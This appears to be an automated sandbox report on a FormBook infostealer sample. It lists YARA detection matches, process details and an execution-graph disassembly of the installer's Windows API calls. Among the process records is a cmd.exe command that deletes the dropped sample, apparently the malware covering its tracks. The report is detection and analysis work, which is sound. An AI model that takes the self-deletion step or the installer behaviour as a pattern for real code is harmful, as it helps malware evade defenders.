                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:high

                  General

                  Target ID:16
                  Start time:13:07:49
                  Start date:14/05/2022
                  Path:C:\Windows\SysWOW64\chkdsk.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\chkdsk.exe
                  Imagebase:0x1040000
                  File size:23040 bytes
                  MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:moderate

                  General

                  Target ID:17
                  Start time:13:07:54
                  Start date:14/05/2022
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:/c del "C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe"
                  Imagebase:0xc20000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:19
                  Start time:13:07:55
                  Start date:14/05/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7c9170000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:16.5%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:16.3%
                    Total number of Nodes:1372
                    Total number of Limit Nodes:22
                    execution_graph 3057 401941 3058 401943 3057->3058 3063 402da6 3058->3063 3064 402db2 3063->3064 3105 4066ab 3064->3105 3067 401948 3069 405d7a 3067->3069 3147 406045 3069->3147 3072 405da2 DeleteFileW 3102 401951 3072->3102 3073 405db9 3075 405ed9 3073->3075 3161 40666e lstrcpynW 3073->3161 3075->3102 3190 4069a4 FindFirstFileW 3075->3190 3076 405ddf 3077 405df2 3076->3077 3078 405de5 lstrcatW 3076->3078 3162 405f89 lstrlenW 3077->3162 3079 405df8 3078->3079 3082 405e08 lstrcatW 3079->3082 3084 405e13 lstrlenW FindFirstFileW 3079->3084 3082->3084 3084->3075 3085 405e35 3084->3085 3088 405ebc FindNextFileW 3085->3088 3098 405d7a 60 API calls 3085->3098 3101 4056d0 24 API calls 3085->3101 3166 40666e lstrcpynW 3085->3166 3167 405d32 3085->3167 3175 4056d0 3085->3175 3186 40642e MoveFileExW 3085->3186 3088->3085 3091 405ed2 FindClose 3088->3091 3089 405d32 5 API calls 3092 405f14 3089->3092 3091->3075 3093 405f18 3092->3093 3094 405f2e 3092->3094 3097 4056d0 24 API calls 3093->3097 3093->3102 3096 4056d0 24 API calls 3094->3096 3096->3102 3099 405f25 3097->3099 3098->3085 3100 40642e 36 API calls 3099->3100 3100->3102 3101->3088 3107 4066b8 3105->3107 3106 4068db 3108 402dd3 3106->3108 3138 40666e lstrcpynW 3106->3138 3107->3106 3110 4068a9 lstrlenW 3107->3110 3113 4066ab 10 API calls 3107->3113 3114 4067c0 GetSystemDirectoryW 3107->3114 3116 4067d3 GetWindowsDirectoryW 3107->3116 3117 40684a lstrcatW 3107->3117 3118 4066ab 10 API calls 3107->3118 3119 4068f5 5 API calls 3107->3119 3120 406802 SHGetSpecialFolderLocation 3107->3120 3131 40653c 3107->3131 3136 4065b5 wsprintfW 3107->3136 3137 40666e lstrcpynW 3107->3137 3108->3067 3122 4068f5 3108->3122 3110->3107 3113->3110 3114->3107 3116->3107 3117->3107 3118->3107 3119->3107 3120->3107 3121 40681a SHGetPathFromIDListW CoTaskMemFree 3120->3121 3121->3107 3128 406902 3122->3128 3123 40697d CharPrevW 3124 406978 3123->3124 3124->3123 3126 40699e 3124->3126 3125 40696b CharNextW 3125->3124 3125->3128 3126->3067 3128->3124 3128->3125 3129 406957 CharNextW 3128->3129 3130 406966 CharNextW 3128->3130 3143 405f6a 3128->3143 3129->3128 3130->3125 3139 4064db 3131->3139 3134 406570 RegQueryValueExW RegCloseKey 3135 4065a0 3134->3135 3135->3107 3136->3107 3137->3107 3138->3108 3140 4064ea 3139->3140 3141 4064f3 RegOpenKeyExW 3140->3141 3142 4064ee 3140->3142 3141->3142 3142->3134 3142->3135 3144 405f70 3143->3144 3145 405f86 3144->3145 3146 405f77 CharNextW 3144->3146 3145->3128 3146->3144 3196 40666e lstrcpynW 3147->3196 3149 406056 3197 405fe8 CharNextW CharNextW 3149->3197 3152 405d9a 3152->3072 3152->3073 3153 4068f5 5 API calls 3159 40606c 3153->3159 3154 40609d lstrlenW 3155 4060a8 3154->3155 3154->3159 3156 405f3d 3 API calls 3155->3156 3158 4060ad GetFileAttributesW 3156->3158 3157 4069a4 2 API calls 3157->3159 3158->3152 3159->3152 3159->3154 3159->3157 3160 405f89 2 API calls 3159->3160 3160->3154 3161->3076 3163 405f97 3162->3163 3164 405fa9 3163->3164 3165 405f9d CharPrevW 3163->3165 3164->3079 3165->3163 3165->3164 3166->3085 3203 406139 GetFileAttributesW 3167->3203 3170 405d5f 3170->3085 3171 405d55 DeleteFileW 3173 405d5b 3171->3173 3172 405d4d RemoveDirectoryW 3172->3173 3173->3170 3174 405d6b SetFileAttributesW 3173->3174 3174->3170 3176 40578d 3175->3176 3178 4056eb 3175->3178 3176->3085 3177 405707 lstrlenW 3180 405730 3177->3180 3181 405715 lstrlenW 3177->3181 3178->3177 3179 4066ab 17 API calls 3178->3179 3179->3177 3183 405743 3180->3183 3184 405736 SetWindowTextW 3180->3184 3181->3176 3182 405727 lstrcatW 3181->3182 3182->3180 3183->3176 3185 405749 SendMessageW SendMessageW SendMessageW 3183->3185 3184->3183 3185->3176 3187 406442 3186->3187 3189 40644f 3186->3189 3206 4062b4 3187->3206 3189->3085 3191 405efe 3190->3191 3192 4069ba FindClose 3190->3192 3191->3102 3193 405f3d lstrlenW CharPrevW 3191->3193 3192->3191 3194 405f08 3193->3194 3195 405f59 lstrcatW 3193->3195 3194->3089 3195->3194 3196->3149 3198 406005 3197->3198 3200 406017 3197->3200 3199 406012 CharNextW 3198->3199 3198->3200 3202 40603b 3199->3202 3201 405f6a CharNextW 3200->3201 3200->3202 3201->3200 3202->3152 3202->3153 3204 405d3e 3203->3204 3205 40614b SetFileAttributesW 3203->3205 3204->3170 3204->3171 3204->3172 3205->3204 3207 4062e4 3206->3207 3208 40630a GetShortPathNameW 3206->3208 3233 40615e GetFileAttributesW CreateFileW 3207->3233 3210 406429 3208->3210 3211 40631f 3208->3211 3210->3189 3211->3210 3213 406327 wsprintfA 3211->3213 3212 4062ee CloseHandle GetShortPathNameW 3212->3210 3214 406302 3212->3214 3215 4066ab 17 API calls 3213->3215 3214->3208 3214->3210 3216 40634f 3215->3216 3234 40615e GetFileAttributesW CreateFileW 3216->3234 3218 40635c 3218->3210 3219 40636b GetFileSize GlobalAlloc 3218->3219 3220 406422 CloseHandle 3219->3220 3221 40638d 3219->3221 3220->3210 3235 4061e1 ReadFile 3221->3235 3226 4063c0 3228 4060c3 4 API calls 3226->3228 3227 4063ac lstrcpyA 3229 4063ce 3227->3229 3228->3229 3230 406405 SetFilePointer 3229->3230 3242 406210 WriteFile 3230->3242 3233->3212 3234->3218 3236 4061ff 3235->3236 3236->3220 3237 4060c3 lstrlenA 3236->3237 3238 406104 lstrlenA 3237->3238 3239 40610c 3238->3239 3240 4060dd lstrcmpiA 3238->3240 3239->3226 3239->3227 3240->3239 3241 4060fb CharNextA 3240->3241 3241->3238 3243 40622e GlobalFree 3242->3243 3243->3220 3244 4015c1 3245 402da6 17 API calls 3244->3245 3246 4015c8 3245->3246 3247 405fe8 4 API calls 3246->3247 3259 4015d1 3247->3259 3248 401631 3250 401663 3248->3250 3251 401636 3248->3251 3249 405f6a CharNextW 3249->3259 3253 401423 24 API calls 3250->3253 3271 401423 3251->3271 3261 40165b 3253->3261 3258 40164a SetCurrentDirectoryW 3258->3261 3259->3248 3259->3249 3260 401617 GetFileAttributesW 3259->3260 3263 405c39 3259->3263 3266 405b9f CreateDirectoryW 3259->3266 3275 405c1c CreateDirectoryW 3259->3275 3260->3259 3278 406a3b GetModuleHandleA 3263->3278 3267 405bf0 GetLastError 3266->3267 3268 405bec 3266->3268 3267->3268 3269 405bff SetFileSecurityW 3267->3269 3268->3259 3269->3268 3270 405c15 GetLastError 3269->3270 3270->3268 3272 4056d0 24 API calls 3271->3272 3273 401431 3272->3273 3274 40666e lstrcpynW 3273->3274 3274->3258 3276 405c30 GetLastError 3275->3276 3277 405c2c 3275->3277 3276->3277 3277->3259 3279 406a61 GetProcAddress 3278->3279 3280 406a57 3278->3280 3281 405c40 3279->3281 3284 4069cb GetSystemDirectoryW 3280->3284 3281->3259 3283 406a5d 3283->3279 3283->3281 3285 4069ed wsprintfW LoadLibraryExW 3284->3285 3285->3283 3759 401c43 3781 402d84 3759->3781 3761 401c4a 3762 402d84 17 API calls 3761->3762 3763 401c57 3762->3763 3764 401c6c 3763->3764 3765 402da6 17 API calls 3763->3765 3766 401c7c 3764->3766 3767 402da6 17 API calls 3764->3767 3765->3764 3768 401cd3 3766->3768 3769 401c87 3766->3769 3767->3766 3770 402da6 17 API calls 3768->3770 3771 402d84 17 API calls 3769->3771 3772 401cd8 3770->3772 3773 401c8c 3771->3773 3774 402da6 17 API calls 3772->3774 3775 402d84 17 API calls 3773->3775 3776 401ce1 FindWindowExW 3774->3776 3777 401c98 3775->3777 3780 401d03 3776->3780 3778 401cc3 SendMessageW 3777->3778 3779 401ca5 SendMessageTimeoutW 3777->3779 3778->3780 3779->3780 3782 4066ab 17 API calls 3781->3782 3783 402d99 3782->3783 3783->3761 3784 405644 3785 405654 3784->3785 3786 405668 3784->3786 3788 4056b1 3785->3788 3789 40565a 3785->3789 3787 405670 IsWindowVisible 3786->3787 3795 405687 3786->3795 3787->3788 3790 40567d 3787->3790 3791 4056b6 CallWindowProcW 3788->3791 3792 404616 SendMessageW 3789->3792 3797 404f85 SendMessageW 3790->3797 3794 405664 3791->3794 3792->3794 3795->3791 3802 405005 3795->3802 3798 404fe4 SendMessageW 3797->3798 3799 404fa8 GetMessagePos ScreenToClient SendMessageW 3797->3799 3801 404fdc 3798->3801 3800 404fe1 3799->3800 3799->3801 3800->3798 3801->3795 3811 40666e lstrcpynW 3802->3811 3804 405018 3812 4065b5 wsprintfW 3804->3812 3806 405022 3807 40140b 2 API calls 3806->3807 3808 40502b 3807->3808 3813 40666e lstrcpynW 3808->3813 3810 405032 3810->3788 3811->3804 3812->3806 3813->3810 3814 4028c4 3815 4028ca 3814->3815 3816 4028d2 FindClose 3815->3816 3817 402c2a 3815->3817 3816->3817 3315 403646 SetErrorMode GetVersionExW 3316 4036d0 3315->3316 3317 403698 GetVersionExW 3315->3317 3318 403729 3316->3318 3319 406a3b 5 API calls 3316->3319 3317->3316 3320 4069cb 3 API calls 3318->3320 3319->3318 3321 40373f lstrlenA 3320->3321 3321->3318 3322 40374f 3321->3322 3323 406a3b 5 API calls 3322->3323 3324 403756 3323->3324 3325 406a3b 5 API calls 3324->3325 3326 40375d 3325->3326 3327 406a3b 5 API calls 3326->3327 3328 403769 #17 OleInitialize SHGetFileInfoW 3327->3328 3405 40666e lstrcpynW 3328->3405 3331 4037b6 GetCommandLineW 3406 40666e lstrcpynW 3331->3406 3333 4037c8 3334 405f6a CharNextW 3333->3334 3335 4037ee CharNextW 3334->3335 3345 4037ff 3335->3345 3336 4038fd 3337 403911 GetTempPathW 3336->3337 3407 403615 3337->3407 3339 403929 3340 403983 DeleteFileW 3339->3340 3341 40392d GetWindowsDirectoryW lstrcatW 3339->3341 3417 4030d0 GetTickCount GetModuleFileNameW 3340->3417 3343 403615 12 API calls 3341->3343 3342 405f6a CharNextW 3342->3345 3346 403949 3343->3346 3345->3336 3345->3342 3349 4038ff 3345->3349 3346->3340 3348 40394d GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3346->3348 3347 403996 3350 403b72 ExitProcess OleUninitialize 3347->3350 3354 403a4b 3347->3354 3360 405f6a CharNextW 3347->3360 3353 403615 12 API calls 3348->3353 3502 40666e lstrcpynW 3349->3502 3351 403b82 3350->3351 3352 403b97 3350->3352 3507 405cce 3351->3507 3357 403c15 ExitProcess 3352->3357 3358 403b9f GetCurrentProcess OpenProcessToken 3352->3358 3359 40397b 3353->3359 3446 403d1d 3354->3446 3365 403be5 3358->3365 3366 403bb6 LookupPrivilegeValueW AdjustTokenPrivileges 3358->3366 3359->3340 3359->3350 3371 4039b8 3360->3371 3362 403a5a 3362->3350 3367 406a3b 5 API calls 3365->3367 3366->3365 3370 403bec 3367->3370 3368 403a21 3373 406045 18 API calls 3368->3373 3369 403a62 3372 405c39 5 API calls 3369->3372 3374 403c01 ExitWindowsEx 3370->3374 3375 403c0e 3370->3375 3371->3368 3371->3369 3376 403a67 lstrcatW 3372->3376 3377 403a2d 3373->3377 3374->3357 3374->3375 3511 40140b 3375->3511 3379 403a83 lstrcatW lstrcmpiW 3376->3379 3380 403a78 lstrcatW 3376->3380 3377->3350 3503 40666e lstrcpynW 3377->3503 3379->3362 3381 403aa3 3379->3381 3380->3379 3383 403aa8 3381->3383 3384 403aaf 3381->3384 3386 405b9f 4 API calls 3383->3386 3387 405c1c 2 API calls 3384->3387 3385 403a40 3504 40666e lstrcpynW 3385->3504 3389 403aad 3386->3389 3390 403ab4 SetCurrentDirectoryW 3387->3390 3389->3390 3391 403ad1 3390->3391 3392 403ac6 3390->3392 3506 40666e lstrcpynW 3391->3506 3505 40666e lstrcpynW 3392->3505 3395 4066ab 17 API calls 3396 403b13 DeleteFileW 3395->3396 3397 403b1f CopyFileW 3396->3397 3402 403ade 3396->3402 3397->3402 3398 403b69 3399 40642e 36 API calls 3398->3399 3399->3362 3400 40642e 36 API calls 3400->3402 3401 4066ab 17 API calls 3401->3402 3402->3395 3402->3398 3402->3400 3402->3401 3403 405c51 2 API calls 3402->3403 3404 403b53 CloseHandle 3402->3404 3403->3402 3404->3402 3405->3331 3406->3333 3408 4068f5 5 API calls 3407->3408 3410 403621 3408->3410 3409 40362b 3409->3339 3410->3409 3411 405f3d 3 API calls 3410->3411 3412 403633 3411->3412 3413 405c1c 2 API calls 3412->3413 3414 403639 3413->3414 3514 40618d 3414->3514 3518 40615e GetFileAttributesW CreateFileW 3417->3518 3419 403113 3445 403120 3419->3445 3519 40666e lstrcpynW 3419->3519 3421 403136 3422 405f89 2 API calls 3421->3422 3423 40313c 3422->3423 3520 40666e lstrcpynW 3423->3520 3425 403147 GetFileSize 3426 403246 3425->3426 3428 40315e 3425->3428 3521 40302e 3426->3521 3428->3426 3432 4032e4 3428->3432 3439 40302e 32 API calls 3428->3439 3428->3445 3552 4035e8 3428->3552 3430 403289 GlobalAlloc 3435 40618d 2 API calls 3430->3435 3433 40302e 32 API calls 3432->3433 3433->3445 3437 4032b4 CreateFileW 3435->3437 3436 40326a 3438 4035e8 ReadFile 3436->3438 3440 4032ee 3437->3440 3437->3445 3442 403275 3438->3442 3439->3428 3536 4035fe SetFilePointer 3440->3536 3442->3430 3442->3445 3443 4032fc 3537 403377 3443->3537 3445->3347 3447 406a3b 5 API calls 3446->3447 3448 403d31 3447->3448 3449 403d37 GetUserDefaultUILanguage 3448->3449 3450 403d49 3448->3450 3572 4065b5 wsprintfW 3449->3572 3452 40653c 3 API calls 3450->3452 3454 403d79 3452->3454 3453 403d47 3573 403ff3 3453->3573 3455 403d98 lstrcatW 3454->3455 3456 40653c 3 API calls 3454->3456 3455->3453 3456->3455 3459 406045 18 API calls 3460 403dca 3459->3460 3461 403e5e 3460->3461 3463 40653c 3 API calls 3460->3463 3462 406045 18 API calls 3461->3462 3464 403e64 3462->3464 3465 403dfc 3463->3465 3466 403e74 LoadImageW 3464->3466 3467 4066ab 17 API calls 3464->3467 3465->3461 3470 403e1d lstrlenW 3465->3470 3474 405f6a CharNextW 3465->3474 3468 403f1a 3466->3468 3469 403e9b RegisterClassW 3466->3469 3467->3466 3473 40140b 2 API calls 3468->3473 3471 403ed1 SystemParametersInfoW CreateWindowExW 3469->3471 3472 403f24 3469->3472 3475 403e51 3470->3475 3476 403e2b lstrcmpiW 3470->3476 3471->3468 3472->3362 3477 403f20 3473->3477 3478 403e1a 3474->3478 3480 405f3d 3 API calls 3475->3480 3476->3475 3479 403e3b GetFileAttributesW 3476->3479 3477->3472 3483 403ff3 18 API calls 3477->3483 3478->3470 3482 403e47 3479->3482 3481 403e57 3480->3481 3581 40666e lstrcpynW 3481->3581 3482->3475 3486 405f89 2 API calls 3482->3486 3484 403f31 3483->3484 3487 403fc0 3484->3487 3488 403f3d ShowWindow 3484->3488 3486->3475 3582 4057a3 OleInitialize 3487->3582 3489 4069cb 3 API calls 3488->3489 3494 403f55 3489->3494 3491 403fc6 3492 403fe2 3491->3492 3495 403fca 3491->3495 3496 40140b 2 API calls 3492->3496 3493 403f63 GetClassInfoW 3498 403f77 GetClassInfoW RegisterClassW 3493->3498 3499 403f8d DialogBoxParamW 3493->3499 3494->3493 3497 4069cb 3 API calls 3494->3497 3495->3472 3500 40140b 2 API calls 3495->3500 3496->3472 3497->3493 3498->3499 3501 40140b 2 API calls 3499->3501 3500->3472 3501->3472 3502->3337 3503->3385 3504->3354 3505->3391 3506->3402 3508 405ce3 3507->3508 3509 403b8f ExitProcess 3508->3509 3510 405cf7 MessageBoxIndirectW 3508->3510 3510->3509 3512 401389 2 API calls 3511->3512 3513 401420 3512->3513 3513->3357 3515 40619a GetTickCount GetTempFileNameW 3514->3515 3516 4061d0 3515->3516 3517 403644 3515->3517 3516->3515 3516->3517 3517->3339 3518->3419 3519->3421 3520->3425 3522 403057 3521->3522 3523 40303f 3521->3523 3526 403067 GetTickCount 3522->3526 3527 40305f 3522->3527 3524 403048 DestroyWindow 3523->3524 3525 40304f 3523->3525 3524->3525 3525->3430 3525->3445 3555 4035fe SetFilePointer 3525->3555 3526->3525 3529 403075 3526->3529 3528 406a77 2 API calls 3527->3528 3528->3525 3530 4030aa CreateDialogParamW ShowWindow 3529->3530 3531 40307d 3529->3531 3530->3525 3531->3525 3556 403012 3531->3556 3533 40308b wsprintfW 3534 4056d0 24 API calls 3533->3534 3535 4030a8 3534->3535 3535->3525 3536->3443 3538 4033a2 3537->3538 3539 403386 SetFilePointer 3537->3539 3559 40347f GetTickCount 3538->3559 3539->3538 3542 40343f 3542->3445 3543 4061e1 ReadFile 3544 4033c2 3543->3544 3544->3542 3545 40347f 38 API calls 3544->3545 3546 4033d9 3545->3546 3546->3542 3547 403445 ReadFile 3546->3547 3549 4033e8 3546->3549 3547->3542 3549->3542 3550 4061e1 ReadFile 3549->3550 3551 406210 WriteFile 3549->3551 3550->3549 3551->3549 3553 4061e1 ReadFile 3552->3553 3554 4035fb 3553->3554 3554->3428 3555->3436 3557 403021 3556->3557 3558 403023 MulDiv 3556->3558 3557->3558 3558->3533 3560 4035d7 3559->3560 3561 4034ad 3559->3561 3562 40302e 32 API calls 3560->3562 3571 4035fe SetFilePointer 3561->3571 3568 4033a9 3562->3568 3564 4034b8 SetFilePointer 3567 4034dd 3564->3567 3565 4035e8 ReadFile 3565->3567 3566 40302e 32 API calls 3566->3567 3567->3565 3567->3566 3567->3568 3569 406210 WriteFile 3567->3569 3570 4035b8 SetFilePointer 3567->3570 3568->3542 3568->3543 3569->3567 3570->3560 3571->3564 3572->3453 3574 404007 3573->3574 3589 4065b5 wsprintfW 3574->3589 3576 404078 3590 4040ac 3576->3590 3578 403da8 3578->3459 3579 40407d 3579->3578 3580 4066ab 17 API calls 3579->3580 3580->3579 3581->3461 3593 404616 3582->3593 3584 4057c6 3588 4057ed 3584->3588 3596 401389 3584->3596 3585 404616 SendMessageW 3586 4057ff OleUninitialize 3585->3586 3586->3491 3588->3585 3589->3576 3591 4066ab 17 API calls 3590->3591 3592 4040ba SetWindowTextW 3591->3592 3592->3579 3594 40462e 3593->3594 3595 40461f SendMessageW 3593->3595 3594->3584 3595->3594 3598 401390 3596->3598 3597 4013fe 3597->3584 3598->3597 3599 4013cb MulDiv SendMessageW 3598->3599 3599->3598 3600 4040cb 3601 4040e3 3600->3601 3602 404244 3600->3602 3601->3602 3603 4040ef 3601->3603 3604 404295 3602->3604 3605 404255 GetDlgItem GetDlgItem 3602->3605 3608 4040fa SetWindowPos 3603->3608 3609 40410d 3603->3609 3607 4042ef 3604->3607 3617 401389 2 API calls 3604->3617 3676 4045ca 3605->3676 3611 404616 SendMessageW 3607->3611 3618 40423f 3607->3618 3608->3609 3612 404116 ShowWindow 3609->3612 3613 404158 3609->3613 3610 40427f KiUserCallbackDispatcher 3614 40140b 2 API calls 3610->3614 3619 404301 3611->3619 3620 404231 3612->3620 3621 404136 GetWindowLongW 3612->3621 3615 404160 DestroyWindow 3613->3615 3616 404177 3613->3616 3614->3604 3623 404574 3615->3623 3624 40417c SetWindowLongW 3616->3624 3625 40418d 3616->3625 3626 4042c7 3617->3626 3628 404555 DestroyWindow EndDialog 3619->3628 3631 40140b 2 API calls 3619->3631 3634 4066ab 17 API calls 3619->3634 3639 4045ca 18 API calls 3619->3639 3648 4045ca 18 API calls 3619->3648 3682 404631 3620->3682 3621->3620 3622 40414f ShowWindow 3621->3622 3622->3613 3623->3618 3632 404584 ShowWindow 3623->3632 3624->3618 3625->3620 3629 404199 GetDlgItem 3625->3629 3626->3607 3630 4042cb SendMessageW 3626->3630 3628->3623 3633 4041aa SendMessageW IsWindowEnabled 3629->3633 3635 4041c7 3629->3635 3630->3618 3631->3619 3632->3618 3633->3618 3633->3635 3634->3619 3636 4041cc 3635->3636 3637 4041d4 3635->3637 3640 40421b SendMessageW 3635->3640 3641 4041e7 3635->3641 3679 4045a3 3636->3679 3637->3636 3637->3640 3639->3619 3640->3620 3643 404204 3641->3643 3644 4041ef 3641->3644 3642 404202 3642->3620 3646 40140b 2 API calls 3643->3646 3645 40140b 2 API calls 3644->3645 3645->3636 3647 40420b 3646->3647 3647->3620 3647->3636 3649 40437c GetDlgItem 3648->3649 3650 404391 3649->3650 3651 404399 ShowWindow EnableWindow 3649->3651 3650->3651 3696 4045ec EnableWindow 3651->3696 3653 4043c3 EnableWindow 3658 4043d7 3653->3658 3654 4043dc GetSystemMenu EnableMenuItem SendMessageW 3655 40440c SendMessageW 3654->3655 3654->3658 3655->3658 3657 4040ac 18 API calls 3657->3658 3658->3654 3658->3657 3697 4045ff SendMessageW 3658->3697 3698 40666e lstrcpynW 3658->3698 3660 40443b lstrlenW 3661 4066ab 17 API calls 3660->3661 3662 404451 SetWindowTextW 3661->3662 3663 401389 2 API calls 3662->3663 3665 404462 3663->3665 3664 404495 DestroyWindow 3664->3623 3666 4044af CreateDialogParamW 3664->3666 3665->3618 3665->3619 3665->3664 3667 404490 3665->3667 3666->3623 3668 4044e2 3666->3668 3667->3618 3669 4045ca 18 API calls 3668->3669 3670 4044ed GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3669->3670 3671 401389 2 API calls 3670->3671 3672 404533 3671->3672 3672->3618 3673 40453b ShowWindow 3672->3673 3674 404616 SendMessageW 3673->3674 3675 404553 3674->3675 3675->3623 3677 4066ab 17 API calls 3676->3677 3678 4045d5 SetDlgItemTextW 3677->3678 3678->3610 3680 4045b0 SendMessageW 3679->3680 3681 4045aa 3679->3681 3680->3642 3681->3680 3683 404649 GetWindowLongW 3682->3683 3684 4046f4 3682->3684 3683->3684 3685 40465e 3683->3685 3684->3618 3685->3684 3686 40468b GetSysColor 3685->3686 3687 40468e 3685->3687 3686->3687 3688 404694 SetTextColor 3687->3688 3689 40469e SetBkMode 3687->3689 3688->3689 3690 4046b6 GetSysColor 3689->3690 3691 4046bc 3689->3691 3690->3691 3692 4046c3 SetBkColor 3691->3692 3693 4046cd 3691->3693 3692->3693 3693->3684 3694 4046e0 DeleteObject 3693->3694 3695 4046e7 CreateBrushIndirect 3693->3695 3694->3695 3695->3684 3696->3653 3697->3658 3698->3660 3821 4016cc 3822 402da6 17 API calls 3821->3822 3823 4016d2 GetFullPathNameW 3822->3823 3824 4016ec 3823->3824 3830 40170e 3823->3830 3827 4069a4 2 API calls 3824->3827 3824->3830 3825 401723 GetShortPathNameW 3826 402c2a 3825->3826 3828 4016fe 3827->3828 3828->3830 3831 40666e lstrcpynW 3828->3831 3830->3825 3830->3826 3831->3830 3832 401e4e GetDC 3833 402d84 17 API calls 3832->3833 3834 401e60 GetDeviceCaps MulDiv ReleaseDC 3833->3834 3835 402d84 17 API calls 3834->3835 3836 401e91 3835->3836 3837 4066ab 17 API calls 3836->3837 3838 401ece CreateFontIndirectW 3837->3838 3839 402638 3838->3839 3840 402950 3841 402da6 17 API calls 3840->3841 3843 40295c 3841->3843 3842 402972 3845 406139 2 API calls 3842->3845 3843->3842 3844 402da6 17 API calls 3843->3844 3844->3842 3846 402978 3845->3846 3868 40615e GetFileAttributesW CreateFileW 3846->3868 3848 402985 3849 402a3b 3848->3849 3852 4029a0 GlobalAlloc 3848->3852 3853 402a23 3848->3853 3850 402a42 DeleteFileW 3849->3850 3851 402a55 3849->3851 3850->3851 3852->3853 3854 4029b9 3852->3854 3855 403377 40 API calls 3853->3855 3869 4035fe SetFilePointer 3854->3869 3857 402a30 CloseHandle 3855->3857 3857->3849 3858 4029bf 3859 4035e8 ReadFile 3858->3859 3860 4029c8 GlobalAlloc 3859->3860 3861 4029d8 3860->3861 3862 402a0c 3860->3862 3863 403377 40 API calls 3861->3863 3864 406210 WriteFile 3862->3864 3867 4029e5 3863->3867 3865 402a18 GlobalFree 3864->3865 3865->3853 3866 402a03 GlobalFree 3866->3862 3867->3866 3868->3848 3869->3858 3870 401956 3871 402da6 17 API calls 3870->3871 3872 40195d lstrlenW 3871->3872 3873 402638 3872->3873 3874 4014d7 3875 402d84 17 API calls 3874->3875 3876 4014dd Sleep 3875->3876 3878 402c2a 3876->3878 3879 4020d8 3880 40219c 3879->3880 3881 4020ea 3879->3881 3884 401423 24 API calls 3880->3884 3882 402da6 17 API calls 3881->3882 3883 4020f1 3882->3883 3885 402da6 17 API calls 3883->3885 3889 4022f6 3884->3889 3886 4020fa 3885->3886 3887 402110 LoadLibraryExW 3886->3887 3888 402102 GetModuleHandleW 3886->3888 3887->3880 3890 402121 3887->3890 3888->3887 3888->3890 3899 406aaa 3890->3899 3893 402132 3896 401423 24 API calls 3893->3896 3897 402142 3893->3897 3894 40216b 3895 4056d0 24 API calls 3894->3895 3895->3897 3896->3897 3897->3889 3898 40218e FreeLibrary 3897->3898 3898->3889 3904 406690 WideCharToMultiByte 3899->3904 3901 406ac7 3902 40212c 3901->3902 3903 406ace GetProcAddress 3901->3903 3902->3893 3902->3894 3903->3902 3904->3901 3905 402b59 3906 402b60 3905->3906 3907 402bab 3905->3907 3909 402ba9 3906->3909 3911 402d84 17 API calls 3906->3911 3908 406a3b 5 API calls 3907->3908 3910 